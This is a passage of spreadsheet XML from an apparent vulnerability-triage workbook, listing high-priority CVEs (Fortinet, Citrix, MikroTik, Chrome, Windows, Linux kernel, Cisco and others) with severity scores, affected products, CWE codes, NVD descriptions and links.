        <v>9.800000000000001</v>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F6" s="5" t="n">
        <v>0.955</v>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>red hat, ubuntu</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr">
        <is>
          <t>synacor:zimbra_collaboration_suite</t>
        </is>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>2022-09-26</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>2022-11-10</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.</t>
        </is>
      </c>
      <c r="M6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-41352</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="C7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F7" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios, fortinet:fortisase, fortinet:fortiswitchmanager, siemens:ruggedcom_ape1808, siemens:ruggedcom_ape1808_firmware</t>
        </is>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>2026-01-13</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets</t>
        </is>
      </c>
      <c r="M7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14733</t>
        </is>
      </c>
      <c r="C8" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F8" s="5" t="n">
        <v>0.265</v>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr">
        <is>
          <t>watchguard:firebox_m270, watchguard:firebox_m290, watchguard:firebox_m295, watchguard:firebox_m370, watchguard:firebox_m390, watchguard:firebox_m395, watchguard:firebox_m440, watchguard:firebox_m4600, watchguard:firebox_m470, watchguard:firebox_m4800</t>
        </is>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>2025-12-19</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>2025-12-26</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>An Out-of-bounds Write vulnerability in the WatchGuard Fireware OS iked process may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer.
If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.</t>
        </is>
      </c>
      <c r="M8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14733</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67038</t>
        </is>
      </c>
      <c r="C9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F9" s="5" t="n">
        <v>0.193</v>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr">
        <is>
          <t>lantronix:e213f102s, lantronix:e213f102s_firmware, lantronix:e214f002s, lantronix:e214f002s_firmware, lantronix:e214f00cs, lantronix:e214f00cs_firmware, lantronix:e214g000s, lantronix:e214g000s_firmware, lantronix:e214g001s, lantronix:e214g001s_firmware</t>
        </is>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>2026-03-11</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Lantronix EDS5000 2.1.0.0R3. The HTTP RPC module executes a shell command to write logs when user's authentication fails. The username is directly concatenated with the command without any sanitization. This allow attackers to inject arbitrary OS commands into the username parameter. Injected commands are executed with root privileges.</t>
        </is>
      </c>
      <c r="M9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67038</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="C10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F10" s="5" t="n">
        <v>0.06</v>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in NetScaler ADC and NetScaler Gateway.
This issue affects ADC: from 14.1 through 73.32 and from 13.1 through 63.21; Gateway: from 14.1 through 73.32 and from 13.1 through 63.21.</t>
        </is>
      </c>
      <c r="M10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="C11" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F11" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L11"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M11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="C12" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L12"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M12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85046</t>
        </is>
      </c>
      <c r="C13" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F13" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr">
        <is>
          <t>google:chrome, google:v8</t>
        </is>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="C14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F14" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-7255</t>
        </is>
      </c>
      <c r="C15" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F15" s="5" t="n">
        <v>0.8100000000000001</v>
      </c>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1511, microsoft:windows_10_1607, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1, microsoft:windows_server_2008, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_vista</t>
        </is>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>2016-11-10</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>2022-05-03</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."</t>
        </is>
      </c>
      <c r="M15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-7255</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-37969</t>
        </is>
      </c>
      <c r="C16" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F16" s="5" t="n">
        <v>0.283</v>
      </c>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_20h2, microsoft:windows_10_21h1, microsoft:windows_10_21h2, microsoft:windows_11_21h2, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1</t>
        </is>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>2022-09-13</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>2022-10-05</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="M16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-37969</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-38352</t>
        </is>
      </c>
      <c r="C17" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F17" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>2025-07-22</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>2025-09-25</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: fix race between handle_posix_cpu_timers() and posix_cpu_timer_del()
If an exiting non-autoreaping task has already passed exit_notify() and
calls handle_posix_cpu_timers() from IRQ, it can be reaped by its parent
or debugger right after unlock_task_sighand().
If a concurrent posix_cpu_timer_del() runs at that moment, it won't be
able to detect timer-&gt;it.cpu.firing != 0: cpu_timer_task_rcu() and/or
lock_task_sighand() will fail.
Add the tsk-&gt;exit_state check into run_posix_cpu_timers() to fix this.
This fix is not needed if CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, because
exit_task_work() is called before exit_notify(). But the check still
makes sense, task_work_add(&amp;tsk-&gt;posix_cputimers_work.work) will fail
anyway in this case.</t>
        </is>
      </c>
      <c r="M17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-38352</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31431</t>
        </is>
      </c>
      <c r="C18" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F18" s="5" t="n">
        <v>0.999</v>
      </c>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>linux kernel, ubuntu</t>
        </is>
      </c>
      <c r="H18" s="5" t="inlineStr">
        <is>
          <t>amazon:amazon_linux, arista:cloudvision_agni, arista:cloudvision_portal, arista:netvisor_os, arista:velocloud_edge, arista:velocloud_gateway, arista:velocloud_orchestrator, canonical:ubuntu_linux, debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-669</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.</t>
        </is>
      </c>
      <c r="M18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31431</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="C19" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="C20" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F20" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G20" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="I20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:M20"/>
  <conditionalFormatting sqref="D2:D2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20">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35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CVE-2026-20079</t>
        </is>
      </c>
      <c r="C2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F2" s="5" t="n">
        <v>0.747</v>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr">
        <is>
          <t>cisco:secure_firewall_management_center</t>
        </is>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>2026-03-04</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.&amp;nbsp;
This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow&amp;nbsp;root access to the device.&amp;nbsp;</t>
        </is>
      </c>
      <c r="M2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="C3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F3" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3"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M3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="C4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F4" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="M4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-4117</t>
        </is>
      </c>
      <c r="C5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F5" s="5" t="n">
        <v>0.944</v>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>adobe:flash_player, opensuse:evergreen, opensuse:opensuse, redhat:enterprise_linux_desktop, redhat:enterprise_linux_server, redhat:enterprise_linux_server_from_rhui, redhat:enterprise_linux_workstation, suse:linux_enterprise_desktop, suse:linux_enterprise_workstation_extension</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>2016-05-11</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>2022-03-24</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.</t>
        </is>
      </c>
      <c r="M5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-4117</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-41352</t>
        </is>
      </c>
      <c r="C6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
